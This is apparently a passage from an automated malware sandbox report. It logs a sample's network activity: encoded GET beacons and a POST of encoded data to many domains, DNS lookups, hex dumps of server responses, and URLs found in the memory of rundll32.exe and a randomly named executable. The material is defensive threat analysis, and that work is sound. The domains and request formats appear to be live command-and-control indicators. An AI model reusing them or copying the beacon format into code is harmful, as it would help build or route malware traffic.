            Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKServer: F-WEBDate: Wed, 03 Jul 2024 08:53:22 GMTContent-Type: text/html; charset=UTF-8Content-Length: 1127Connection: closeContent-Encoding: gzipFAI-W-FLOW: 1439867166Service-Lane: 3dfaa8cea5756c822fcb55c2bf34e96eFAI-W-AGENT_AID: 23934566Update-Time: 1718640911Src-Update: trueP3P: CP=CAO PSA OUROrigin-Agent-Cluster: ?0X-Content-Type-Options: nosniffX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 1; mode=blockX-Download-Options: noopenVary: Accept-EncodingSet-Cookie: _cliid=QWDiENi4xHZuMd2b; domain=www.yetung.com; path=/; expires=Thu, 03-Jul-2025 08:53:22 GMT; HttpOnlyData Raw: 1f 8b 08 00 00 00 00 00 00 00 cd 57 5b 6f dc 44 14 fe 2b 87 46 95 41 aa d7 7b c9 26 8d f7 22 35 97 15 91 8a e0 21 48 f0 54 cd da 63 ef 34 b6 c7 8c 67 d3 6c 57 91 a0 22 e2 01 89 52 01 aa 48 91 ca 03 0f 95 10 a9 04 12 20 da d0 1f 43 92 4d 9e f8 0b cc 8c ed dd 59 ef 26 55 a5 3c b0 96 bc eb f1 b9 7c df 77 ce 1c 7b 9b 6f ad bf bf b6 f5 f1 07 1b f0 ee d6 7b b7 db cd 1e 0f 03 71 c6 c8 6d 37 43 cc 11 38 3d c4 12 cc 5b 46 9f 7b e6 4d 23 5b ed 71 1e 9b f8 93 3e d9 69 19 1f 99 1f de 32 d7 68 18 23 4e ba 01 36 c0 a1 11 c7 91 70 d9 dc 68 61 d7 17 2b 56 e6 16 a1 10 b7 8c 6d 3c b8 47 99 9b 68 96 a6 31 6d e2 e2 c4 61 24 e6 84 46 45 2b 4e 78 80 db 66 d3 4a 7f 34 13 3e 08 30 f0 41 2c dc 38 de e5 96 93 88 c8 21 76 09 6a 19 22 0a c6 d1 8d 98 91 88 1b ed 2e 75 07 43 e8 22 67 db 67 b4 1f b9 f6 42 67 45 1e 8d 10 31 9f 44 36 94 e3 dd 86 27 b2 99 1e 0a 49 30 b0 8d 93 bf 0f cf 8e 9e 9f 3f d9 3f 7f f1 c8 b8 61 9c 1c 7e 79 7c f4 8d d1 00 65 94 90 fb d8 ae 54 85 cf 5e a9 4b 77 87 f7 88 cb 7b 36 54 ca e5 eb 93 88 80 fa 9c 36 7a 98 f8 3d 6e ab 0b 65 0c 25 05 7f 2d a5 06 43 d0 9d bb 42 1d cc cc 2e e5 9c 86 a6 43 03 ca 6c 58 c0 35 79 34 02 12 61 33 8b 57 97 80 35 42 63 db 4e a7 53 88 a2 64 b2 21 a1 01 71 0b b7 f2 d4 39 91 02 b6 f4 2a 63 57 2b cb 94 7a fa 94 a9 19 60 8f db 95 fa f5 46 8c 5c 97 44 be c9 69 6c 57 15 be 6c c5 96 4a 01 5c ac af 2e ab f2 cc d9 2c 56 97 96 ba d5 1c 5c d6 0e 19 a0 65 1d 90 d2 3a 93 3e 53 1e 32 ae 02 ce 58 1d cf f3 1a 73 44 f3 56 e4 d1 d0 1c e6 89 26 d7 35 c5 60 1a 15 94 30 63 94 6d 86 7e 86 af 5a d3 f0 55 d2 82 65 08 e5 1d 05 12 0a 65 b4 a1 cf 82 b7 af 59 d6 dd fb 25 0f 91 64 90 88 f0 a1 45 42 e4 63 4b c5 97 e7 3b 24 f4 ef 74 fd 52 1c f9 d7 de 81 88 9a 0c c7 18 71 19 0c 4c 95 75 6f 82 2a 4c fc 71 8f 2d 2d 6b 90 a0 32 5d a4 ca 05 2d 25 7a aa dc a9 77 36 20 d3 41 b1 Data Ascii: W[oD+FA{&"5!HTc4glW"RH CMY&U<|w{o{qm7C8=[F{M#[q>i2h#N6pha+Vm<Gh1ma$FE+NxfJ4>0A,8!vj".uC"ggBgE1D6'I0??a~y|eT^Kw{6T6z=ne%-CB.ClX5y4a3W5BcNSd!q9*cW+z`F\DilWlJ\.,V\e:>S2XsDV&5`0cm~ZUeeY%dEBcK;$t
            Source: global trafficHTTP traffic detected: GET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1Host: www.zt555.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /f0fa/?Qb94=7vWTifjxU&ylT8el=xEHl79bWtW6ubhQfSoH97y0Qn20SG8yk5613CYRnCuX+EaUdTnw5hRzhIFWMyf9Ue4jcKh73mqYqHXL3KYCSgMywK+MaAYZcUVEgz/x9qwHKwJpT4dGZYKc= HTTP/1.1Host: www.hawalaz.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /qvp8/?ylT8el=mplvrs1ArIkdV+pbxofmUrh9prbBWCkT+xqmpCLdJLMyBhuMsd9mhte1ppk8n/DSN9iY8LBVRzSodz5vy5F/ty/lBcXgfSQQVjq9BvSoxXo59QHAZm1IeeI=&Qb94=7vWTifjxU HTTP/1.1Host: www.66hc7.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /450c/?Qb94=7vWTifjxU&ylT8el=/ao65P+sOfMmbfuniX6EnBn+VadGjlZ4IHs7OXNxrL4MnIz0MXJ+3t4uCaWRdYsePUgUyRGsjSJtYkpLrLyO4a/zR2SZCsSjaR7P/IMYlkzk2RPJsuViTJY= HTTP/1.1Host: www.zl1l5r.websiteAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /f0bn/?Qb94=7vWTifjxU&ylT8el=8gTqnLvKWah2bzreY4Z7YC6tcQCJVJlJXhg7Umglyi2zgynbPTp6zLopmb5gqsRo3dR1TaY9uWyFfEDO77D4zzlWEvz5BTf+ZLZnZGAxAhIiwZDsfI/I78A= HTTP/1.1Host: www.marismotivates.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wtfXMV6NH8/OF6YHWAlqEER8GnTX5dWMAhSA7fR+Y7D5EkGrHLT25bAuzXf+rRNu6kcJM= HTTP/1.1Host: www.lecoinsa.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /i74x/?ylT8el=rGww97JzOeWTLmyois9H82aBQ3facQDCwEviMnQ79nb2eFak94tqYxOEecYPqZ845ayBGu2PRCoY8TnogyJmQQHYtnGZFnvjZEpOTC2C7mypHaGwxY9ZF1g=&Qb94=7vWTifjxU HTTP/1.1Host: www.778981.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /fuvg/?Qb94=7vWTifjxU&ylT8el=wjL2fUVi/vacV80Y2aNNPqSsAyaVO2G0XUXvAjUGJRlNA9hvm73ZM/ZGCRwMrdgYWSVcgksWY7rEUvpJmp/24/R5TooPs7UexVe6llrM7njVoxJ4Iww3fUU= HTTP/1.1Host: www.yetung.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /73ru/?ylT8el=Zh+IM8qjm4uq8k9wxtMLd6Xf0ZIUNYGdjg1+kqPemyuHWYjZ2nTRrdxzh5HhdoGeXRxYWxa1gnZNrA+Bjjg73w83aTj9n1osxTjbZgXdDDbnL1DvvKoogN8=&Qb94=7vWTifjxU HTTP/1.1Host: www.oliviacorepilates.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /6xrq/?Qb94=7vWTifjxU&ylT8el=0ZLpfg2H9HntusEXGWgUouKi/jDeWipEcG796wEdKEsBvDcnIDw0UWV/lYuuqMa5oYme4k6lXZ3r5FhP4GItrsCavENJ4moU1CqQcclLTaPymUsAULXTIFQ= HTTP/1.1Host: www.personalcaresale.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /6qht/?ylT8el=uv+LHhobnH+SyOAbX9GzDMPimlyd0mIqpPmIf9VchnwZRWYaEtRt5W9pqYxhRwpbfDifuk3w05PJo1ySs8BePpe0vNNcbDdG6zcEL5spVXXRDXig7aJejtk=&Qb94=7vWTifjxU HTTP/1.1Host: www.lavillitadepapa.comAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficHTTP traffic detected: GET /l25n/?Qb94=7vWTifjxU&ylT8el=auppmJM7eN7J/jcd3Cnnc7lcHiLNgr09bdvJbM3sU1/Dmtxph+2FzvX7ZDnD2EcIcX9RCCjXq1LDmMY1SoU+nq8rcMPpo2Cr+tMuRnJbKxq7CEWaX/NqKVE= HTTP/1.1Host: www.zt555.shopAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-US,en;q=0.9Connection: closeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0
            Source: global trafficDNS traffic detected: DNS query: www.zt555.shop
            Source: global trafficDNS traffic detected: DNS query: www.pista789.win
            Source: global trafficDNS traffic detected: DNS query: www.hawalaz.xyz
            Source: global trafficDNS traffic detected: DNS query: www.dribbean.website
            Source: global trafficDNS traffic detected: DNS query: www.gzlhysuess.com
            Source: global trafficDNS traffic detected: DNS query: www.66hc7.com
            Source: global trafficDNS traffic detected: DNS query: www.zl1l5r.website
            Source: global trafficDNS traffic detected: DNS query: www.xn--vct91ch7lruy.com
            Source: global trafficDNS traffic detected: DNS query: www.marismotivates.com
            Source: global trafficDNS traffic detected: DNS query: www.warcorpshs.com
            Source: global trafficDNS traffic detected: DNS query: www.lecoinsa.net
            Source: global trafficDNS traffic detected: DNS query: www.778981.com
            Source: global trafficDNS traffic detected: DNS query: www.yetung.com
            Source: global trafficDNS traffic detected: DNS query: www.oliviacorepilates.com
            Source: global trafficDNS traffic detected: DNS query: www.personalcaresale.shop
            Source: global trafficDNS traffic detected: DNS query: www.lavillitadepapa.com
            Source: unknownHTTP traffic detected: POST /f0fa/ HTTP/1.1Host: www.hawalaz.xyzAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Encoding: gzip, deflateAccept-Language: en-US,en;q=0.9Origin: http://www.hawalaz.xyzContent-Length: 203Cache-Control: no-cacheConnection: closeContent-Type: application/x-www-form-urlencodedReferer: http://www.hawalaz.xyz/f0fa/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:37.0) Gecko/20100101 Firefox/37.0Data Raw: 79 6c 54 38 65 6c 3d 38 47 76 46 34 49 48 44 6b 78 66 52 53 42 30 72 5a 49 6d 4d 39 51 31 30 73 7a 42 79 48 74 33 37 6f 35 68 4e 4d 36 46 6c 4d 4a 48 6f 47 49 6f 42 58 7a 6b 67 6d 6e 50 75 59 69 65 2f 68 62 39 33 63 76 54 54 48 42 72 30 6e 36 64 66 4f 57 76 58 4c 50 69 70 7a 74 36 55 49 62 6b 74 61 2f 52 65 4d 55 34 54 6e 75 64 72 71 41 62 45 7a 59 46 66 6b 75 57 4a 63 62 2b 66 54 56 66 63 56 77 50 45 43 69 53 59 57 4e 51 49 4c 36 67 36 4f 75 30 32 64 41 4b 6b 48 38 65 78 37 6c 33 73 4b 55 2b 67 63 54 57 63 36 30 72 66 73 77 78 49 76 76 6d 63 36 79 2b 7a 50 68 61 52 4e 47 32 63 62 2f 6a 55 4b 67 3d 3d Data Ascii: ylT8el=8GvF4IHDkxfRSB0rZImM9Q10szByHt37o5hNM6FlMJHoGIoBXzkgmnPuYie/hb93cvTTHBr0n6dfOWvXLPipzt6UIbkta/ReMU4TnudrqAbEzYFfkuWJcb+fTVfcVwPECiSYWNQIL6g6Ou02dAKkH8ex7l3sKU+gcTWc60rfswxIvvmc6y+zPhaRNG2cb/jUKg==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 08:50:51 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 08:51:23 GMTServer: ApacheContent-Length: 16026Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 74 77 69 74 74 65 72 2d 62 6f 6f 74 73 74 72 61 70 2f 34 2e 31 2e 33 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 6d 69 6e 2e 63 73 73 27 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 73 74 79 6c 65 2e 63 73 73 22 3e 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 21 2d 2d 20 70 61 72 74 69 61 6c 3a 69 6e 64 65 78 2e 70 61 72 74 69 61 6c 2e 68 74 6d 6c 20 2d 2d 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 68 61 6d 62 75 72 67 65 72 2d 6d 65 6e 75 22 3e 0a 20 20 3c 62 75 74 74 6f 6e 20 63 6c 61 73 73 3d 22 62 75 72 67 65 72 22 20 64 61 74 61 2d 73 74 61 74 65 3d 22 63 6c 6f 73 65 64 22 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 0a 20 20 3c 2f 62 75 74 74 6f 6e 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 6d 61 69 6e 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 72 6f 77 22 3e 0a 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6c 2d 6d 64 2d 36 20 61 6c 69 67 6e 2d 73 65 6c 66 2d 63 65 6e 74 65 72 22 3e 0a 20 20 20 20 20 20 20 20 3c 73 76 67 20 76 65 72 73 69 6f 6e 3d 22 31 2e 31 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 78 6d 6c 6e 73 3a 78 6c 69 6e 6b 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 6c 69 6e 6b 22 0a 20 20 20 20 20 20 20 20 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 38 30 30 20 36 30 30 22 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 64 65 66 73 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 47 6c 61 73 73 43 6c 69 70 22 3e 0a 20 20
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 08:53:45 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2F3VUpqZ02hxAOrdy5rAfygw52MPm9RKb2e6ChyOTy8THX61WcOizyyoVHDmOmHVsL7090hm83orzOA6wqFuoU1rJGNNK2nJtr0jOsbUqjYf%2FEIt0zyvWMMBBMLaV%2FmboV9sF2mm52ldDM1G"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d5a59d5f5a72b3-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 08:53:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rja9d8I04aHyYYI%2FqkuA7cgALUyPoYfNmWCImh3yaBuU8Y46Jd8RZ3XlgT80qIQN%2Fkazy4QeqgFHvQjKQr5gTjxvHBjriPkDMSsfjUklIjGIAcDYy6CRB1Fbw%2B%2B7ujvMVDXrna5Jt6o4jNZe"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d5a5adcdbf42bb-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 0d 0a 61 0d 0a 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: fa0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 08:53:50 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L1Y%2FznWSJWw9k9Cb7166enshXr7IU5eRh0bEVR2zsJimcF0rzg8kMSSrvAl%2BaQbiDanA6%2F%2BDf9v6wIbQF9VSzicuNsfbnG1%2BCGkdMKhDUQazHRQL1dNdALEvP%2BtAJyOccGyX104oGut4KN%2Fs"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d5a5bcfe6bc358-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400Data Raw: 31 39 0d 0a 1f 8b 08 00 00 00 00 00 00 03 00 00 00 ff ff 03 00 00 00 00 00 00 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 190
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 03 Jul 2024 08:53:52 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingX-Powered-By: PHP/7.4.33CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=v7%2FAPg60HedazsEu0tfq0EBkBUklhLNHZEJ780Pp9KCObyaD0j61WR%2FDFLW8YUU2Fgk1%2B6EJbsFsvurC6JbEFrGa155G3IPuHGA3s%2BZhWjqRknQV6Wj%2BfSnuc%2FR8MU0nADJ44KWeABjK92Yh"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 89d5a5cce971c339-EWRalt-svc: h3=":443"; ma=86400Data Raw: 30 0d 0a 0d 0a Data Ascii: 0
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 03 Jul 2024 08:54:15 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://app.zl1ht1.website/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://beian.miit.gov.cn
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005A7E000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.000000000412E000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://goge8opp.com:301
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004908000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&amp;ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQE
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000006258000.00000004.10000000.00040000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.0000000004908000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://lecoinsa.net/i4bw/?Qb94=7vWTifjxU&ylT8el=BGypU6jCFwhFV44EsRt3vJ0ZkLzgh7cGR6aJrYKV4XeIufQEn2wt
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://m.rmrwvg.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://news.wawlh.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wap.tdvec.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://wap.warsr.cn/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.a9d.net
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3730033950.0000000005A43000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lavillitadepapa.com
            Source: UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3730033950.0000000005A43000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.lavillitadepapa.com/6qht/
            Source: rundll32.exe, 0000000B.00000002.3728535943.0000000005C10000.00000004.10000000.00040000.00000000.sdmp, rundll32.exe, 0000000B.00000002.3731111988.00000000076F0000.00000004.00000800.00020000.00000000.sdmp, UTbMqukHxZGmxEZNWddXnDURe.exe, 0000000E.00000002.3726057895.00000000042C0000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://www.qq42cw.website/news/MzSm.html
